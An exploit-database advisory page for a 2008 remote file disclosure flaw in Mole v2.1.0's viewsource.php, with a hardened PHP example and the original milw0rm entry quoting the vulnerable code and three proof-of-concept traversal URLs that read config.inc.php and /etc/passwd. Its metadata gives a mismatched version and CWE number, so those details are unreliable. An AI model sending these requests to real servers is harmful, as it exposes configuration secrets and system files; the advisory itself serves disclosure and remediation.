Vendor: Mole
By: milw0rm.com
CVSS: 7.5 (HIGH)
Type: Remote File Disclosure
CWE: 434
Product Name: Mole
Affected Version From: 2.1.2000
Affected Version To: 2.1.2000
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability

Mole v2.1.0 is vulnerable to remote file disclosure because viewsource.php does not sanitize user-supplied input: the dirn and fname request parameters are concatenated and passed directly to highlight_file(). An attacker can exploit this by sending a specially crafted HTTP request to the vulnerable application, which allows viewing sensitive files on the server, such as configuration files and source code.

Mitigation:

Validate and sanitize user-supplied input before it is used to build a file path. Additionally, restrict access to sensitive files to only those users who need it.
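A hardened counterpart to the viewsource.php logic, given here as an added example that is not part of the advisory or of Mole's code: it resolves dirn and fname to a canonical path and checks containment before calling highlight_file(). The templates/ root, the .tpl/.html allowlist and the resolve_template() helper are assumptions made for illustration.

```php
<?php
// Added example, not Mole's code. The template root and the extension
// allowlist are assumptions; adjust both to the real installation.
const ALLOWED_EXTENSIONS = ['tpl', 'html'];
// Map dirn/fname to a canonical path inside $root, or null if not allowed.
function resolve_template(string $root, string $dirn, string $fname): ?string
{
    // No NUL bytes; fname must be a bare file name without a directory part.
    if (strpos($dirn . $fname, "\0") !== false
        || $fname === '' || basename($fname) !== $fname) {
        return null;
    }
    $ext = strtolower(pathinfo($fname, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return null;
    }
    // realpath() collapses "..", follows symlinks and fails on missing files.
    $rootReal  = realpath($root);
    $candidate = realpath($root . '/' . $dirn . '/' . $fname);
    if ($rootReal === false || $candidate === false || !is_file($candidate)) {
        return null;
    }
    // Containment: the canonical path must start with the canonical root.
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($candidate, $prefix, strlen($prefix)) === 0 ? $candidate : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample tree: one template, one config file outside the root.
    $base = sys_get_temp_dir() . '/mole_demo_' . getmypid();
    mkdir("$base/templates/default", 0700, true);
    mkdir("$base/include", 0700, true);
    file_put_contents("$base/templates/default/page.tpl", "<h1>{title}</h1>\n");
    file_put_contents("$base/include/config.inc.php", "<?php // constructed\n");
    $cases = [['default', 'page.tpl'], ['../include', 'config.inc.php'],
              ['', 'include/config.inc.php'], ['../../../../../../../', 'etc/passwd']];
    foreach ($cases as [$dirn, $fname]) {
        $ok = resolve_template("$base/templates", $dirn, $fname) !== null;
        printf("dirn=%-24s fname=%-24s %s\n", $dirn, $fname, $ok ? 'served' : 'rejected');
    }
} else {
    // Web entry point: render only a path that passed every check above.
    $dirn  = $_GET['dirn'] ?? '';
    $fname = $_GET['fname'] ?? '';
    $path  = (is_string($dirn) && is_string($fname))
        ? resolve_template(__DIR__ . '/templates', $dirn, $fname) : null;
    if ($path === null) { http_response_code(404); exit; }
    highlight_file($path);
}
```

Run from the php CLI, the script builds the constructed tree and reports each case; under a web SAPI the same file acts as the request handler.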

Exploit-DB raw data:

#  Mole v2.1.0 (viewsource.php) Remote File Disclosure Vulnerability
#  Script : http://sourceforge.net/project/showfiles.php?group_id=164171
#  Vuln Code :
##############################################################################
#    <html>
#    <head>
#    <title>Mole: Template viewer</title>
#    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
#    </head>
#    <body>
#    
#    <?php
#    $dirn = $_REQUEST['dirn']; <--- XxX
#    $fname = $_REQUEST['fname']; <--- XxX
#    
#    
#    highlight_file($dirn.$fname); <--- XxX
#    ?>
#    
#    </body>
#    </html>
##############################################################################
#  POC :
#      /mole_2_1_0/viewsource.php?dirn=include/config.inc.php
#      /mole_2_1_0/viewsource.php?fname=include/config.inc.php
#      /mole_2_1_0/viewsource.php?dirn=../../../../../../../&fname=etc/passwd
##############################################################################
#  Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr 
##############################################################################

# milw0rm.com [2008-04-07]